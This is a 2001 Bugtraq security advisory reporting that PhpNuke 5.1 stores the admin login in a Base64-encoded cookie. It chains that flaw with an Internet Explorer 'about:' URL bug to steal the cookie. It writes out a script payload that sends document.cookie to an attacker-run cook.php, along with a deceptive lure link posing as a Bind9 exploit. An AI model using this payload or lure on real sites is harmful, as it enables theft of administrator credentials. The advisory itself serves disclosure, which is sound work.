[23214] in bugtraq
PhpNuke Admin password can be stolen !
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Cabezon_Aur=E9lien?)
Wed Nov 21 20:34:10 2001
Message-ID: <01b401c172e1$ecf5e2f0$f439fdc1@London>
From: =?iso-8859-1?Q?Cabezon_Aur=E9lien?= <aurelien.cabezon@isecurelabs.com>
To: <vuln-dev@securityfocus.com>, <bugtraq@securityfocus.com>,
<vulnwatch@vulnwatch.org>, <bugs@securitytracker.com>,
<staff@securiteam.com>
Date: Thu, 22 Nov 2001 00:11:54 +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
PhpNuke Admin password can be stolen !
by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com
http://www.isecurelabs.com/article.php?sid=229 [FR VERSION] + screen shot
Vulnerable : PhpNuke 5.1
Other version : not tested
PostNuke : not tested
[1] Introduction
I have found a way to stole PhpNuke Admin password.
I use 2 vulnerability.
[2] Description
The first vulnerability is that ADMIN login/passwd are stored in a cookie
like this :
---snip---
lang
english
isecurelabs.com/
0
725504896
29523774
551579360
29450340
*
admin
QWRtaW46TmljZV9Ucnk6DQo=
isecurelabs.com/
0
1451582336
29456384
3432929360
29450340
*
---snip---
and i discovered that the Admin password was BASE64 encoded !
So it is very easy to decode it !
Fore exemple :
QWRtaW46TmljZV9Ucnk6DQo= is Admin:Nice_Try:
You can verify here : http://www.isecurelabs.com/base64.php
The second vulnerability i use is the "Microsoft IE Cookies Exposure via
'About:' URLS"
exposed here : http://www.securiteam.com/windowsntfocus/6I00D1535I.html
Here is the plan :
First create a php script that can gather getenv("QUERY_STRING") in a file.
Then create this kind of link and force the phpnuke administrator to follow
it :
[a
href="about://www.nuked-site.com/[script]window.open("http://www.yourwebsite
.com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9
remote root exploit ![/a]
(replace [ & ] by < & >)
www.nuked-site.com is the site that you want to get cookie.
www.yourwebsute.com is the site that will recieve the cookie thru the
cook.php script.
If the nuked site's admin follow this link, he will send to your script his
cookie with the Base64 encoded password.
Then you just have to decode it !
That's all !
regards,
---
Cabezon Aurélien | aurelien.cabezon@isecurelabs.com
http://www.iSecureLabs.com | French Security Portal
